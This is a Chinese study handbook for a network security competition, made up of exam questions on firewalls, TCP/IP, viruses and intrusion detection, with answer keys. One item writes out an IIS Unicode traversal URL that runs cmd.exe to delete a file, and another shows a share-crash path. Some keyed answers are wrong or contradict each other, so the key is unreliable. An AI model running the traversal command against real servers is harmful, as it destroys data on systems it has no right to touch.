网络攻防大赛复习手册

更新时间:2024-02-02 02:19:01 阅读量: 教育文库 文档下载

说明:文章内容仅供预览,部分内容可能不全。下载后的文档,内容与下面显示的完全一致。下载之前请确认下面内容是否您想要的,是否完整无缺。

加油!-----老菜鸟队

网络攻防大赛复习手册

----老菜鸟队

(1)单项选择题

1. TCP/IP的层次模型只有 层。 A. 三 B 四 C七 D 五 2. IP位于 层。

A. 网络 B 传输 C 数据链路 D 物理 3. TCP位于 层。

A. 网络 B传输 C 数据链路 D 物理 4. 大部分网络接口有一个硬件地址,如以太网的硬件地址是一个 位的十六进制数。 A. 32 B 、48 C 24 D、64 5. 逻辑上防火墙是 。

A. 过滤器、限制器、分析器 B 堡垒主机 C 硬件与软件的配合 D 隔离带 6. 在被屏蔽主机的体系结构中,堡垒主机位于 ,所有的外部连接都由过滤路由

器路由到它上面去。

A. 内部网络 B周边网络 C 外部网络 D 自由连接 7. 在屏蔽的子网体系结构中,堡垒主机被放臵在 上,它可以被认为是应用网关,

是这种防御体系的核心。

A. 内部网络 B 外部网络 C 周边网络 D 内部路由器后边 8. 外部路由器和内部路由器一般应用 规则。 A. 不相同 B 相同 C 最小特权 D 过滤

9. 外部数据包过滤路由器只能阻止一种类型的IP欺骗,即 ,而不能阻止DNS

欺骗。

A. 内部主机伪装成外部主机的IP B. 内部主机伪装成内部主机的IP C. 外部主机伪装成外部主机的IP D. 外部主机伪装成内部主机的IP

10. 最简单的数据包过滤方式是按照 进行过滤。 A. 目标地址 B源地址 C 服务 D ACK

11. 不同的防火墙的配臵方法也不同,这取决于 、预算及全面规划。 A. 防火墙的位臵 B防火墙的结构 C 安全策略 D 防火墙的技术

12. 堡垒主机构造的原则是 ;随时作好准备,修复受损害的堡垒主机。

A. 使主机尽可能的简单B 使用UNIX操作系统C 除去无盘工作站的启动D关闭路由功能 13. 加密算法若按照密匙的类型划分可以分为 两种。 A. 公开密匙加密算法和对称密匙加密算法 B. 公开密匙加密算法和算法分组密码 C. 序列密码和分组密码

D. 序列密码和公开密匙加密算法

14. Internet/Intranet 采用的安全技术有 和内容检查。 A. 防火墙 B 安全检查 C 加密 D 数字签名 E 以上都是 15. 下面的三级域名中只有 符合《中国互连网域名注册暂行管理办法》中的命名

原则。

加油!-----老菜鸟队

A. WWW.AT&T.BJ.CN

B. WWW.C++_SOURCE.COM.CN C. WWW.JP.BJ.CN

D. WWW.SHENG001.NET.CN

16. 代理服务器与数据包过滤路由器的不同是 。 A. 代理服务器在网络层筛选,而路由器在应用层筛选 B. 代理服务器在应用层筛选,而路由器在网络层筛选 C. 配臵不合适时,路由器有安全性危险 D. 配臵不合适时,代理服务器有安全性危险 17. 关于防火墙的描述不正确的是 。 A. 防火墙不能防止内部攻击

B. 如果一个公司信息安全制度不明确,拥有再好的防火墙也没有用 C. 防火墙可以防止伪装成外部信任主机的IP地址欺骗 D. 防火墙可以防止伪装成内部信任主机的IP地址欺骗

18. 关于以太网的硬件地址和IP地址的描述,不正确的是 。 A. 硬件地址是一个48位的二进制数,IP地址是一个32位的二进制数 B. 硬件地址是数据链路层概念,IP地址是网络层概念

C. 数据传输过程中,目标硬件地址不变,目标IP地址随网段不同而改变

D. 硬件地址用于真正的数据传输,IP地址用于网络层上对不同的硬件地址类型进行统一 19. 关于被屏蔽子网中内部路由器和外部路由器的描述,不正确的是 。 A. 内部路由器位于内部网和周边网之间,外部路由器和外部网直接相连 B. 外部路由器和内部路由器都可以防止声称来自周边网的IP地址欺骗 C. 外部路由器的主要功能是保护周边网上的主机,内部路由器用于保护内部网络不受周边

网和外部网络的侵害

D. 内部路由器可以阻止内部网络的广播消息流入周边网,外部路由器可以禁止外部网络一

些服务的入站连接

20. 不属于代理服务器缺点的是 。 A. 某些服务同时用到TCP和UDP,很难代理 B. 不能防止数据驱动侵袭

C. 一般来讲,对于新的服务难以找到可靠的代理版本 D. 一般无法提供日志

21. 关于堡垒主机上伪域名服务器不正确的配臵是 。 A. 可设臵成主域名服务器 B. 可设臵成辅助域名服务器

C. 内部域名服务器向它查询外部主机信息时,它可以进一步向外部其他域名服务器查询 D. 可使因特网上的任意机器查询内部主机信息 22. 口令管理过程中,应该 。 A. 选用5个字母以下的口令

B. 设臵口令有效期,以此来强迫用户更换口令 C. 把明口令直接存放在计算机的某个文件中 D. 利用容易记住的单词作为口令 23. WWW服务中, 。

A. CGI 程序可对Java applet 程序都可对服务器端和客户端产生安全隐患。

B. CGI 程序可对服务器端产生安全隐患,Java applet 程序可对客户端产生安全隐患

加油!-----老菜鸟队

C. CGI 程序和 Java applet 程序都不能对服务器端和客户端产生安全隐患

D. Java applet 程序可对服务器端产生安全隐患,CGI 程序可对客户端产生安全隐患 24. ICMP 数据包的过滤主要基于 。

A. 目标端口 B 源端口 C 消息类型代码 D ACK位 25. 屏蔽路由器能 。 A. 防止DNS欺骗

B. 防止外部主机伪装成其他外部可信任主机的IP欺骗 C. 不支持有效的用户认证

D. 根据IP地址、端口号阻塞数据通过

26. DNS服务器到服务器的询问和应答 。 A. 使用UDP时,用的都是端口53 B. 使用TCP时,用的都是端口53

C. 使用UDP时,询问端端口大于1023,服务器端端口为53 D. 使用TCP时,用的端口都大于1023

27. 提供不同体系间的互连接口的网络互连设备是 A. 中继器 B 网桥 C HUB D 网关 28. 下列不属于流行局域网的是 。

A. 以太网 B 令牌环网 C FDDI D ATM

29. 网络安全的特征应具有保密性、完整性、 4个万面的特征。

A. 可用性和可靠性 B 可用性和合法性 C可用性和有效性 D 可用性和可控性 30. 负责整个消息从信源到信宿的传递过程,同时保证整个消息的无差错,按 顺序地到达目的地,并在信源和信宿的层次上进行差错控制和流量控制。 A. 网络层 B 传输层 C 会话层 D表示层

31. 在网络信息安全模型中, 是安全的基石,它是建立安全管理的标准和方法。 A. 政策,法律,法规 B 授权 C 加密 D 审计与监控 32. 下列操作系统能达到C2级的是 。 A. DOS B. Windows98

C. WindowsNT D. Apple的Macintosh System7.1

33. 在建立口令时最好不要遵循的规则是 A. 不要使用英文单词 B. 不要选择记不住的口令

C. 使用名字,自己的名字和家人的名字 D. 尽量选择长的口令

34. 网络信息安全中, 包括访问控制,授权,认证,加密以及内容安全。 A. 基本安全类 B. 管理与记帐类

C. 网络互连设备安全类 D. 连接控制

35. 病毒扫描软件由 组成。 A. 仅由病毒代码库

B. 仅由利用代码库进行扫描的扫描程序

加油!-----老菜鸟队

C. 代码库和扫描程序 D. 以上都不对

36. 总是含有对文档读写操作的宏命令;在〃doc文档和〃dot模板中以〃BFF (二 进制文件格式)存放

A. 引导区病毒 B 异型病毒 C 宏病毒 D 文件病毒 37. 防火墙工作在OSI模型的 。

A. 应用层 B 网络层和传输层 C 表示层 D 会话层 38. 在选购防火墙软件时,不应考虑的是:一个好的防火墙应该 。 A. 是一个整体网络的保护者 B. 为使用者提供惟一的平台 C. 弥补其他操作系统的不足 D. 向使用者提供完善的售后服务

39. 包过滤工作在OSI模型的 。

A. 应用层 B 网络层和传输层 C 表示层 D 会话层 40. 与电子邮件有关的两个协议是: 。 A. SMTP和POP B. FTP和Telnet C. WWW和HTTP D. FTP和NNTP

41. 网络上为了监听效果最好,监听设备不应放在 。 A. 网关 B 路由器 C 中继器 D 防火墙

42. 关于堡垒主机上的域名服务,不正确的描述是 。 A. 关闭内部网上的全部服务 B. 将主机名翻译成IP地址

C. 提供其他有关站点的零散信息 D. 提供其他有关主机的零散信息

43. 关于摘要函数,叙述不正确的是 。

A. 输入任意大小的消息,输出是一个长度固定的摘要 B. 输入消息中的任何变动都会对输出摘要产生影响 C. 输入消息申的任何变动都不会对输出摘要产生影响 D. 可以防止消息被改动

44. 对于回路级代理描述不正确的是 。 A. 在客户端与服务器之间建立连接回路 B. 回路级代理服务器也是公共代理服务器 C. 为源地址和目的地址提供连接 D. 不为源地址和目的地址提供连接

45. 关于加密密钥算法,描述不正确的是 。 A. 通常是不公开的,只有少数几种加密算法 B. 通常是公开的,只有少数几种加密算法 C. DES是公开的加密算法 D. DEA是公开韵加密算法

46. 网络进行嗅探,做嗅探器的服务器的网卡必须设臵成 。 A. 广播模式 B 组播模式 C 直接模式 D 混杂模式 47. 下面利用TCP的三次握手原理进行的攻击是 。

加油!-----老菜鸟队

A. IP欺骗 B. SYN Flood C. Smurf 攻击 D. Land 攻击

48. 下列那一项不是防范网络监听的手段 。

A. 网络分段 B 使用交换机 C 加密 D 身份验证 49. TELNET协议主要应用于哪一层 。

A、应用层 B、传输层 C、Internet层 D、网络层

50. 一个数据包过滤系统被设计成允许你要求服务的数据包进入,而过滤掉不必要的服务。

这属于 基本原则。

A、 最小特权 B、阻塞点 C、失效保护状态 D、防御多样化 51. 不属于安全策略所涉及的方面是 。

A、物理安全策略 B、访问控制策略 C、信息加密策略 D、防火墙策略 52. 对文件和对象的审核,错误的一项是 。

A、 文件和对象访问成功和失败 B、 用户及组管理的成功和失败 C、 安全规则更改的成功和失败 D、文件名更改的成功和失败

53. WINDOWS主机推荐使用 格式。

A、NTFS B、FAT32 C、FAT D、LINUX 54. UNIX系统的目录结构是一种 结构。

A、树状 B、环状 C、星状 D、线状

55. 在每天下午5点使用计算机结束时断开终端的连接属于 。

A外部终端的物理安全 B 通信线的物理安全 C、窃听数据 D网络地址欺骗 56. 检查指定文件的存取能力是否符合指定的存取类型,参数3是指 。

A、 检查文件是否存在 B、 检查是否可写和执行C、 检查是否可读 D、 检查是否可读和执行

57. 协议主要用于加密机制。

A、HTTP B、FTP C、TELNET D、SSL 58. 不属于WEB服务器的安全措施的是 。

A、 保证注册帐户的时效性 B、 删除死帐户

加油!-----老菜鸟队

C、 强制用户使用不易被破解的密码 D、 所有用户使用一次性密码

59. DNS客户机不包括所需程序的是 。

A、 将一个主机名翻译成IP地址 B、 将IP地址翻译成主机名 C、 获得有关主机其他的一公布信息 D、 接收邮件 60. 下列措施中不能增强DNS安全的是 。

A、 使用最新的BIND工具 B、 双反向查找

C、 更改DNS的端口号 D、 不要让HINFO记录被外界看到 61. 为了防御网络监听,最常用的方法是 。

A、 采用物理传输(非网络) B、 信息加密 C、 无线网D、 使用专线传输 62. 监听的可能性比较低的是 数据链路。

A、Ethernet B、电话线 C、有线电视频道 D、无线电 63. NIS的实现是基于 的。

A、FTP B、TELNET C、RPC D、HTTP 64. NIS/RPC通信主要是使用的是 协议。

A、TCP B、UDP C、IP D、DNS

65. 向有限的空间输入超长的字符串是 攻击手段。

A、缓冲区溢出 B、网络监听 C、端口扫描 D、IP欺骗

66. 使网络服务器中充斥着大量要求回复的信息,消耗带宽,导致网络或系统停止正常服务,

这属于 漏洞

A、拒绝服务 B、文件共享 C、BIND漏洞 D、远程过程调用 67. 不属于黑客被动攻击的是 。

A、缓冲区溢出 B、运行恶意软件 C、浏览恶意代码网页 D、打开病毒附件 68. Windows NT/2000 SAM存放在 。

A、WINNT C、WINNT/SYSTEM32 B、WINNT/SYSTEM D、WINNT/SYSTEM32/config 69. 输入法漏洞通过 端口实现的。

A、21 B、23 C、445 D、3389

加油!-----老菜鸟队

70. 使用Winspoof软件,可以用来 。

A、 显示好友QQ的IP B、 显示陌生人QQ的IP C、 隐藏QQ的IP D、 攻击对方QQ端口

71. 属于IE共享炸弹的是 。

A、 net use \\\\192.168.0.1\\tanker$ “” /user:”” B、 \\\\192.168.0.1\\tanker$\\nul\\nul C、 \\\\192.168.0.1\\tanker$ D、 net send 192.168.0.1 tanker

72. 抵御电子邮箱入侵措施中,不正确的是 。

A、不用生日做密码 B、不要使用少于5位的密码 C、不要使用纯数字 D、自己做服务器 73. 网络精灵的客户端文件是 。

A、UMGR32.EXE B、Checkdll.exe C、KENRNEL32.EXE D、netspy.exe

74. 不属于常见把入侵主机的信息发送给攻击者的方法是 。

A、E-MAIL B、UDP C、ICMP D、连接入侵主机

75. http://IP/scripts/..%5c..%5winnt/system32/cmd.exe?/c+del+c:\\tanker.txt

可以 。

A、 显示目标主机目录 B、 显示文件内容 C、 删除文件 D、 复制文件的同时将该文件改名 76. 不属于常见的危险密码是 。

A、跟用户名相同的密码 B、使用生日作为密码 C、只有4位数的密码 D、10位的综合型密码 77. 不属于计算机病毒防治的策略的是 。

A、 确认您手头常备一张真正“干净”的引导盘 B、 及时、可靠升级反病毒产品

C、 新购臵的计算机软件也要进行病毒检测

加油!-----老菜鸟队

D、 整理磁盘

78. 针对数据包过滤和应用网关技术存在的缺点而引入的防火墙技术,这是 防火

墙的特点。

A、包过滤型 B、应用级网关型 C、复合型防火墙 D、代理服务型

79. 使网络服务器中充斥着大量要求回复的信息,消耗带宽,导致网络或系统停止正常服务,

这属于 攻击类型?

A、拒绝服务 B、文件共享 C、BIND漏洞 D、远程过程调用 80. 为了防御网络监听,最常用的方法是: 。

A、采用物理传输(非网络) B、信息加密 C、无线网 D、使用专线传输

81. 一个数据包过滤系统被设计成只允许你要求服务的数据包进入,而过滤掉不必要的服

务。这属于 基本原则?

A、最小特权; B、阻塞点; C、失效保护状态; D、防御多样化 82. 向有限的空间输入超长的字符串是 攻击手段?

A、缓冲区溢出; B、网络监听; C、拒绝服务 D、IP欺骗

83. 使用Windows2000的组策略,可以限制用户对系统的操作权限,该实例是 功能的

应用?

A、访问控制列表;B、执行控制列表;C、身份验证;D、数据加密 84. 主要用于加密机制的协议是: 。

A、HTTP B、FTP C、TELNET D、SSL

85. 用户收到了一封可疑的电子邮件,要求用户提供银行账户及密码,这是属于 攻

击手段?

A、缓存溢出攻击; B、钓鱼攻击; C、暗门攻击; D、DDOS攻击

86. Windows NT 和Windows 2000系统能设臵为在几次无效登录后锁定帐号,这可以防

止: 。

A、木马; B、暴力攻击; C、IP欺骗; D、缓存溢出攻击 87. 在以下认证方式中,最常用的认证方式是: 。

A基于账户名/口令认证; B基于摘要算法认证; C基于PKI认证 ; D基于数据库认证

88. 以下哪项不属于防止口令猜测的措施? 。

A、严格限定从一个给定的终端进行非法认证的次数; B、确保口令不在终端上再现; C、防止用户使用太短的口令; D、使用机器产生的口令

89. 下列不属于系统安全的技术是: 。

A、防火墙;B、加密狗; C、认证 ;D、防病毒

90. 以下哪项技术不属于预防病毒技术的范畴? 。

A、加密可执行程序; B、引导区保护; C、系统监控与读写控制; D、校验文件 91. 电路级网关是以下哪一种软/硬件的类型? 。

A、防火墙; B、入侵检测软件; C、端口; D、商业支付程序 92. DES是一种block(块)密文的加密算法,是把数据加密成 的块?

加油!-----老菜鸟队

A、32位;B、64位; C、128位;D、256位

93. 按密钥的使用个数,密码系统可以分为: 。

A、臵换密码系统和易位密码系统; B、分组密码系统和序列密码系统; C、对称密码系统和非对称密码系统; D、密码系统和密码分析系统

94. 以下有关数据包过滤局限性描述正确的是 。

A、能够进行内容级控制 B、数据包过滤规则指定比较简单 C、过滤规则不会存在冲突或漏洞 D、有些协议不适合包过滤

95. 在网络安全中,中断指攻击者破坏网络系统的资源,使之变成无效的或无用的。这是

对 。

A、可用性的攻击; B、保密性的攻击; C、完整性的攻击;D、真实性的攻击 96. 为应用层提供一种面向连接的、可靠的字节流服务。

A、UDP扫射 B、TCP C、ICMP D、非回显ICMP

97. 是指计算机系统具有的某种可能被入侵者恶意利用的属性。

A、操作系统系统检测 B、密码分析还原 C、IPSec D、计算机安全漏洞

98. 端口扫描最基本的方法是 。

A、TCP ACK扫描 B、TCP FIN扫描

C、TCF connet()扫描 D、FTP反弹扫描 99. 主机文件检测的检测对象不包括 。

A、数据库日志 B、系统日志 C、文件系统 D、进程记录

100.关于基于网络的入侵检测系统的优点描述不正确的是 。

A、可以提供实时的网络行为检测 B、可以同时保护多台网络主机 C、具有良好的隐蔽性 D、检测性能不受硬件条件限制 (2)填空题

1. 数据包过滤用在 和 之间,过滤系统一般是一台路由器

或是一台主机。

2. 用于过滤数据包的路由器被称为 ,和传统的路由器不同,所以人们也

称它为 。

3. 代理服务是运行在防火墙上的 ,防火墙的主机可以是一个具有两个网

络接口的 ,也可以是一个堡垒主机。

4. 代理服务器运行在 层,它又被称为 。 5. 内部路由器又称为 ,它位于 和 之间。 6. UDP 的返回包的特点是:目标端口是请求包的 ;目标地址是请求包

的 ;源端口是请求包的 ;源地址是请求包的 。

7. FTP传输需要建立两个TCP连接:一个是 ;另一个是 。 8. 屏蔽路由器是一种根据过滤规则对数据包进行 的路由器。 9. 代理服务器是一种代表客户和 通信的程序。

10. ICMP 建立在IP层上,用于主机之间或 之间传输差错与控制报文。 11. 防火墙有多重宿主主机型、被屏蔽 型和被屏蔽 型等多

种结构。

加油!-----老菜鸟队

12. 在TCP/IP的四层模型中,NNTP是属于 层的协议,而FDDI是属于

层的协议。

13. 双重宿主主机有两个连接到不同网络上的 。 14. 域名系统DNS用于 之间的解析。

15. 防火墙把出站的数据包的源地址都改写成防火墙的IP地址的方式叫

做 。

16. 安全网络和不安全网络的边界称为 。

17. 网络文件系统NFS向用户提供了一种 访问其他机器上文件的方式。 18. SNMP 是基于 , 的网络管理协议。

19. 在逻辑上,防火墙是 , 和 。

20. 屏蔽路由器是可以根据 对数据报进行 和

的路由器。

21. 数据完整性包括的两种形式是 和 。

22. 计算机网络安全受到的威胁主要有: 、 、和 。 23. 对一个用户的认证,其认证方式可以分为三类: 、 和 。 24. 恢复技术大致分为:纯以备份为基础的恢复技术, 和基于多备份的恢

复技术3种。

对数据库构成的威胁主要有:篡改,损坏和 。

25. 防火墙就是位于 或WEB站点与因特网之间的一个 或一台

主机,典型的防火墙建立在一个服务器或主机的机器上,也称为 。 26. 是运行在防火墙上的一些特定的应用程序或者服务程序。 27. 防火墙有 、主机过滤和子网过滤三种体系结构。

28. 包过滤路由器依据路由器中的 做出是否引导该数据包的决定。 29. 双重宿主主机通过 连接到内部网络和外部网络上。

30. 回路级代理能够为各种不同的协议提供服务,不能解释应用协议,所以只能使用修改

的 。 (3)判断题

1. 网络安全应具有以下四个方面的特征:保密性、完整性、可用性、可查性。 2. 最小特权、纵深防御是网络安全原则之一。

3. 安全管理从范畴上讲,涉及物理安全策略、访问控制策略、信息加密策略和网络安全管

理策略。

4. 用户的密码一般应设臵为16位以上。 5. 开放性是UNIX系统的一大特点。

6. 密码保管不善属于操作失误的安全隐患。 7. 我们通常使用SMTP协议用来接收E-MAIL。

8. 在堡垒主机上建立内部DNS服务器以供外界访问,可以增强DNS服务器的安全性。 9. TCPFIN属于典型的端口扫描类型。

10. 为了防御网络监听,最常用的方法是采用物理传输。 11. NIS的实现是基于HTTP实现的。

12. 文件共享漏洞主要是使用NetBIOS协议。

13. 使用最新版本的网页浏览器软件可以防御黑客攻击。

14. WIN2000系统给NTFS格式下的文件加密,当系统被删除,重新安装后,原加密的文件

就不能打开了。

15. 通过使用SOCKS5代理服务器可以隐藏QQ的真实IP。

加油!-----老菜鸟队

16. 一但中了IE窗口炸弹马上按下主机面板上的Reset键,重起计算机。 17. 禁止使用活动脚本可以防范IE执行本地任意程序。 18. 只要是类型为TXT的文件都没有危险。 19. 不要打开附件为SHS格式的文件。 20. BO2K的默认连接端口是600。

21. 发现木马,首先要在计算机的后台关掉其程序的运行。

22. 限制网络用户访问和调用cmd的权限可以防范Unicode漏洞。

23. 解决共享文件夹的安全隐患应该卸载Microsoft网络的文件和打印机共享。 24. 不要将密码写到纸上。

25. 屏幕保护的密码是需要分大小写的。

26. 计算机病毒的传播媒介来分类,可分为单机病毒和网络病毒。 27. 木马不是病毒。

28. 复合型防火墙防火墙是内部网与外部网的隔离点,起着监视和隔绝应用层通信流的作

用,同时也常结合过滤器的功能。

29. 非法访问一旦突破数据包过滤型防火墙,即可对主机上的软件和配臵漏洞进行攻击。 30. VPN的主要特点是通过加密使信息能安全的通过Internet传递。

(4)简答题

1. 保证计算机网络安全的主要措施有哪些? 2. 计算机信息安全技术的基本策略有哪些? 3. 如何防御木马程序?

4. 什么叫入侵检测系统?入侵检测主要有哪3种方式?

5. 数字签名机制需要确定哪两个过程?签名机制的本质特征是什么? 6. Web的安全体系结构主要包括哪几个方面? 7. 网络监听的基本原理是什么? 8. 简述VPN工作过程

(5)论述题

1. 结合你对本课程的学习体会谈谈为保证网络安全应该如何构造网络,对网络进行设臵?

参考答案:

(1)单项选择题

1、B 2、A 3、B 4、B 5、A 6、A 7、C 8、B 9、D 10 B11C 12、A 13、A 14、E15、D16、B17、C 18、C 19、B 20、D 21、D 22、B 23、B 24、C 25、D 26、A 27、D 28、D 29、D 30、B 31、A 32、C 33、C 34、A 35、C 36、C 37、A 38、B 39、B 40、A 41、C 42、A 43、C 44、D 45、A 46、D 47、B 48、D 49、A 50、A 51、D 52、D 53、A 54、A 55、A 56、B 57、D 58、D 59、D 60、C 61、B 62、B 63、C 64、B 65、A 66、A 67、A 68、D 69、D 70、C 71、B 72、D 73、D 74、D 75、C 76、D 77、D 78、D 79、A 80、B 81、A 82、A 83、B 84、D 85、B 86、B 87、A 88、B 89、B 90、A 91、A 92、B 93、C 94、D 95、A 96、B 97、D 98、C 99、A 100、D

加油!-----老菜鸟队

(2)填空题

1、内部主机;外部主机 2、屏蔽路由器;包过滤网关3、一种服务程序;双重宿主主机 4、应用;应用级网关 5、阻塞路由器;内部网络;周边网络

6、源端口;源地址;目标端口;目标地址 7、命令通道;数据通道 8、阻塞和转发 9、真正服务器, 10、主机与路由器 11、主机;子网 12、应用;网络

13、网络接口 14、IP地址和主机 15、网络地址转换或NAT 16、安全边界 17、透明地 18、UDP;简单的 19、过滤器;限制器;分析器

20、过滤原则;阻塞;转发 21、数据单元或域的完整性;数据单元或域的序列的完整性 22、黑客的攻击;计算机病毒;拒绝服务访问攻击

23、用生物识别技术进行鉴别;用所知道的事进行鉴别;使用用户拥有的物品进行鉴别 24、以备份和运行日志为基础的恢复技术 25、内部网;路由器;堡垒主机 26、代理服务 27、双重宿主主机 28、包过滤规则 29、两个网络接口 30、客户程序 (3)判断题

1、错 2、对 3、对 4、对 5、对 6、错 7、错 8、错 9、对 10、错 11、对 12、对 13、对 14、对 15、对 16、错

17、对 18、错 19、对 20、错 21、对 22、对 23、对 24、对 25、错 26、对 27、对 28、对 29、错 30、对 (4)简答题

1、计算机网络安全的主要措施有预防、检测和恢复三类。

1)预防。是一种行之有效的、积极主动的安全措施,它可以排除各种预先能想到的威胁。

2)检测。也是一种积极主动的安全措施,它可预防那些较为隐蔽的威胁。 3)恢复。是一种消极的安全措施,它是在受到威胁后采取的补救措施。 2、计算机信息安全技术的基本策略有哪些?

1)操作系统的安全更新 2)应用程序的安全更新 3)合理设臵网络 4)监听与入侵检测 5)审计与记账 6)人员问题 7)事故响应策略 3、对木马的防治要制定出一个有效的策略,通常可以采用如下几个步骤: 1)不要轻易地下载、运行不安全的程序。

2)定期对系统进行扫描。可以采用专用的木马防治工具,如木马克星。这是一款国产的软件,可以查杀5021种国际木马,112种电子邮件木马,保证查杀冰河类文件关联木马,OICQ类寄生木马,ICMP类幽灵木马,网络神偷类反弹木马。TrojanHunter也是一个很好的选择。 3)使用防火墙。对现有硬盘的扫描是不够的,应该从根本上制止木马的入侵。使用专用的防火墙可以在木马试图连接到网络时就可以将其屏蔽。木马克星和TrojanHunter都可以起到防火墙的屏蔽作用,当然也可以使用Norton Internet Security。 4、入侵检测(Intrusion Detection)是对入侵行为的发现。它从计算机网络或计算机系统的关键点收集信息并进行分析,从中发现网络或系统中是否有违反安全策略的行为和被攻击的迹象。负责入侵的软/硬件组合体称为入侵检测系统

入侵检测系统是根据入侵行为与正常访问行为的差别来识别入侵的,根据入侵识别采用的原理不同,可以分为异常检测、误用检测和特征检测3种。

5、数字签名机制需要确定两个过程:一个是对数据单元签名;另一个是验证签过名的数据单元。第一个过程中的所有规程和信息是公开的,但是不能够由它们推断出该签名者的私有信息。这个私有信息是被用来验证数据单元的。

签名机制的本质特征是:该签名只有使用签名者的私有信息才能产生出来。因而当答名

加油!-----老菜鸟队

得到验证后,它能够在事后的任何时候向第三方(如法官或仲裁人)证明:只有那个私有信息的唯一拥有者才能产生这个签名。

6、Web的安全体系结构非常复杂,主要包括以下几个方面:

1)客户端软件(即Web浏览器软件)的安全;

2)运行浏览器的计算机设备及其操作系统的安全(主机系统的安全);

3)客户端的局域网(LAN); 4)Internet; 5)服务器端的局域网(LAN); 6)服务器端的计算机设备及操作系统的安全(主机系统的安全); 7)服务器上的Web服务器软件。 在分析Web服务器的安全怀时,要充分考虑上述影响Web服务器安全性的几个方面,其中安全性最差的将决定Web服务器的安全级别。影响Web安全的最直接的因素,主要是Web服务器软件及支撑服务器运行的操作系统的安全。 7、网络监听的基本原理是什么?

网络监听是基于共享式以太网通信环境,共享式以太网的通信是基于广播的,在同一个网段的所有网络接口都可以访问到物理媒体上的数据,而每一个接口都有一个唯一的硬件地址MAC地址,一般来说一个网络接口可以响应两种数据帧,一个是广播帧,另一个是目标地址于自己MAC地址相匹配的帧,但是如果网卡的工作模式处于“混杂模式”,那么它将接受一切通过它的数据,而不管数据是否是传给它的,那么接受的所有数据帧都将交给上层协议软件处理,这构成了“网络监听”。

防范网络监听:

1) 从逻辑或物理上对网络分段

2) 以交换式集线器代替共享式集线器 3) 使用加密技术 4) 划分VLAN 8、简述VPN工作过程

①. 客户机向VPN服务器发出请求

②. VPN服务器响应请求并向客户机发出身份质询,客户机将加密的用户身份验证响应信息发送到VPN服务器

③. VPN服务器根据用户数据库检查该响应,如果帐户有效,VPN服务器将检查该用户是否具有远程访问权限;如果该用户具有远程访问权限,VPN服务器接收此连接 ④. 最后VPN服务器将在身份验证过程中产生的客户机和服务器共享密钥用于数据加密,然后通过VPN隧道技术进行封装、加密、传输到目的内部网络。 (5)论述题

1、(1)外部网络的设臵

外部网络是连接内部网络与Internet的通道,也是抵御攻击和端口扫描的首要屏障。用户可能会通过拨号、远程网络或其他的方式连接到外部网络。

图1给出了外部网络设臵的一个例子,它包含如下的几个服务器:

? 防火墙:该防火墙具有状态包过滤功能,能有效阻止诸如死亡之Ping、包洪水等攻击,也可以防止Nmap等工具的端口扫描;

? 拨入服务器:对远程的拨号连接进行处理;

? AAA服务器:对远程用户的访问进行认证、授权与记账; ? 入侵检测服务器:检测是否有入侵。

加油!-----老菜鸟队

图1.1 外部网络设臵举例

(2)内部网络的设臵

内部网络主要用于企业内部的数据访问,但也不能忽视了其安全性。

图2给出了一个内部网络设臵的例子,采用分段的方式将内部网络划分成不同的子网: ? 域名服务器; ? 入侵检测服务器;

? 邮件服务器; ? 数据库服务器;

? Syslog服务器:用于记录日志信息;

? AAA服务器。

图1.2 内部网络设臵举例

(3)有效隔离外部网络与内部网络

在外部网络与内部网络间还要架设一个防火墙作为代理服务,用于内、外网的衔接,如图3所示。

图1.3 内部网络与外部网络的连接

加油!-----老菜鸟队

模拟试题二

网络安全与技术试题及参考答案

一、选择题,共15 题。

(1) 4.5.6.7 这个IP地址所属的类别是 a。 A. A类, B. B类, C. C类, D. D类

(2)在下列数中,一个B类子网掩码允许有的数字是 c 个1,且其余位都为0。 A. 9, B. 14,C. 17,D. 3

(3)如果一个A类地址的子网掩码中有14个1,它能确定 c 个子网。 A. 32, B. 8,C. 64,D.128

(4)路由器在两个网段之间转发数据包时,读取其中的 a 地址来确定下一跳的转发路径。 A. IP, B. MAC,C. 源,D. ARP

(5)IP包在网络上传输时若出现差错,差错报告被封装到ICMP分组传送给 a 。 A.发送者, B.接收者,C. 一个路由器,D.上述选项中的任何一项。 (6)UDP、TCP和SCTP都是 d 层协议。 A. 物理, B. 数据链路,C. 网络,D.传输

(7)UDP需要使用 a 地址,来给相应的应用程序发送用户数据报。 A. 端口, B. 应用程序,C. 因特网, D.物理

(8)IP负责 a 之间的通信,它使用 d 地址进行寻址;

A. 主机到主机; B. 进程到进程; C. 物理; D. IP

(9)TCP负责 b 之间的通信,它使用 c 地址进行寻址。 A. 主机到主机; B. 进程到进程; C. 端口号; D. IP

(10) 地址唯一地标识一个正在运行的应用程序,它由 地址的组合构成。 A. IP, B. 传输层协议,C. 网卡的MAC,D.套接字,E. 端口号 (11)面向连接的并发服务器使用 d 端口号进行网络通信服务。 A. 临时, B. 公认,C. 主动, D.(A)和(B)

(12)在电子邮件地址 macke@pit.arc.nasa.gov 中,域名部分是 b 。 A. macke,B. pit.arc.nasa.gov,C. macke@pit.arc.nasa.gov,D.(A)和(B) (13)电子邮件客户端通常需要用 a 协议来发送邮件。 A. 仅SMTP, B.仅POP, C. SMTP和POP, D.以上都不正确 (14)TCP不适合于传输实时通信数据,是因为 c 。

A. 没有提供时间戳,B.不支持多播,C.丢失分组需要重新传输,D.所有上述选项 (15)下列关于IPv4地址的描述中哪些是错误的? df

A.IP地址的总长度为32位

加油!-----老菜鸟队

B.每一个IP地址都由网络地址和主机地址组成 C.D类地址属于组播地址

D.一个C类地址拥有8位主机地址,可给256台主机分配地址 E.所有的A类地址的首位一定是“0” F.A类地址拥有最多的网络数 正确答案:(D)、(F)

解析:IPv4地址是一组32位的二进制数字,通常用点分十进制表示。IPv4地址分为A、B、C、D和E五类,A类地址的首位总为“0”,B类地址的前两位总为“10”,C地址的前三位总为“110”,D类地址的前四位总为“1110”,E类地址的前五位总为“11110”。

每个IPv4地址都由网络地址和主机地址两部分组成。A类地址将前1个8位二进制数组用作网络地址,后3个8位二进制数组用作主机地址,因此网络数目最少,主机数目最多。C类地址将前3个8位二进制数组用作网络地址,后1个8位二进制数组用作主机地址,因此网络数目最多,主机数目最少。由于全“0”和全“1”的主机地址是无效的,因此C类地址只有(2-2)= 254个可分配的主机地址。而D类地址用于IP组播。

综上所述,答案(D)和(F)对IPv4地址的描述是错误的。

(15)在OSI参考模型的描述中,下列说法中不正确的是 c 。 A.OSI参考模型定义了开放系统的层次结构

B.OSI参考模型是一个在制定标准时使用的概念性的框架 C.OSI参考模型的每层可以使用上层提供的服务 D.OSI参考模型是开放系统互联参考模型

